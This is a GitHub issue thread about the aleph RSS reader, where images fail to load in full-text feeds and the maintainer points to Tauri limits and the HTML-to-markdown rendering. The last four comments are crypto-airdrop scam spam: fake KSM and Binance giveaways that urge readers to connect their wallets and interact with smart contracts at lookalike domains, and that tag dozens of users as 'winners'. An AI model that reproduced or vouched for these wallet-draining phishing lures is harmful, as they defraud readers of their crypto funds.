### ISSUE TITLE
Some images not loading when using full version of feeds

### ISSUE THREAD

**Issue by rp1231** [chezhe/aleph#18]
RSS feed: https://www.theverge.com/rss/full.xml
![aleph_27BkVgDo8N](https://user-images.githubusercontent.com/47380919/178477369-a3fb65ed-57b0-429b-86d9-cb171534af0f.png)

**Comment by chezhe** [comment]
Is this image http link? If so, it's normal because of Tauri limits

**Comment by rp1231** [comment]
Yep.
Oh ok, If that's the case.

**Comment by chezhe** [comment]
Here is the logic of show notes render:

https://github.com/chezhe/aleph/blob/master/src/components/Reader.tsx#L146-L151

It converts html into markdown, and then renders the markdown, it seems failing to parse the html correctly.

**Comment by chezhe** [comment]
> @chezhe I had opened an issue regarding this in grommet. The latest version has fixed this, so updating to the latest version of grommet should fix this issue.

BTW, I am building a mobile app with same name and same features, but with react-native, not tauri. TestFlight version can be found here https://testflight.apple.com/join/Advfu4dn

**Comment by chezhe** [comment]
Try if it works https://github.com/chezhe/aleph/releases/tag/v0.7.1

**Comment by chezhe** [comment]
I think it's sqlite migration problem, before I use `BOOLEAN` for `read` and `starred` property, after upgrade sqlite plugin, it doesn't support `BOOLEAN` any more and tranform `BOOLEAN` to `TEXT`.

**Comment by chezhe** [comment]
I can't, because they move sqlite plugin to another repo.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by parallaxlogicdevelopment** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by BhavyClover** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @jw-jackson, @curiouscosmos, @Cymatical, @AsedaDeveloper, @szare, @M-Sayeh, @Kunoacc, @ambegossi-sparta, @0xSenseii, @harrydeluxe, @jTanG0506, @gloredo, @DudeChill, @Mugi5715, @781191131, @dritani, @FullStackable, @drdah123, @johnnymedhanie, @NobreConde, @pucedoteth, @ronakmehtaa29, @choudhary, @ashutoshsaboo, @0xN1nja, @cesargdm, @fturkyilmaz, @IgorKowalczyk, @0xOptimism, @sipitalie, @inaridiy, @jsgovea, @momka1234, @daweth, @michaelessiet, @ultrawav-legacy, @saagaarsooni, @heavenbean, @aslobodnik, @igaozp, @baoskee, @sbusso, @dodicandra, @ok1a, @arthurtyukayev, @hamlim, @serkanalgl, @jesuscovam, @tangert, @EnoRage

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @cijianzy, @jingjunLi, @waterliu99, @hamberluo, @heihei2015, @SuperManager, @yanjianlong
